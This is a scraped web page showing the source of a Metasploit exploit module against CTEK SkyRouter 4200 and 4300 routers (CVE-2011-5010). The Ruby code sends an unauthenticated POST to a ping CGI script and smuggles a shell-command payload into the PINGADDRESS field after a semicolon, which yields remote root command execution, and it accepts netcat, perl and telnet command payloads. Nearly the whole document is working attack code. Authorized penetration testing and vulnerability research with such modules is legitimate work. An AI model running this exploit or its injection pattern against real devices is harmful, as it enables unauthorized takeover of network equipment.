Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/http/ctek_skyrouter.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(update_info(info,13'Name' => 'CTEK SkyRouter 4200 and 4300 Command Execution',14'Description' => %q{15This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.16},17'Author' => [ 'savant42' ], #with module help from kos18'License' => MSF_LICENSE,19'References' => [20['CVE', '2011-5010'],21['OSVDB', '77497']22],23'Privileged' => false,24'Payload' =>25{26'DisableNops' => true,27'Space' => 1024,28'Compat' =>29{30'PayloadType' => 'cmd',31'RequiredCmd' => 'generic perl telnet netcat netcat-e',32}33},34'Platform' => 'unix',35'Arch' => ARCH_CMD,36'Targets' => [[ 'Automatic', { }]],37'DisclosureDate' => '2011-09-08', # CGI historical date :)38'DefaultTarget' => 0))3940end4142def exploit43post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"44uri = '/apps/a3/cfg_ethping.cgi'45print_status("Sending HTTP request for #{uri}")46res = send_request_cgi( {47'global' => true,48'uri' => uri,49'method' => "POST",50'data' => post_data51}, 30)5253if res54print_status("The server responded with HTTP CODE #{res.code}")55else56print_status("The server did not respond to our request")57end5859handler60end61end626364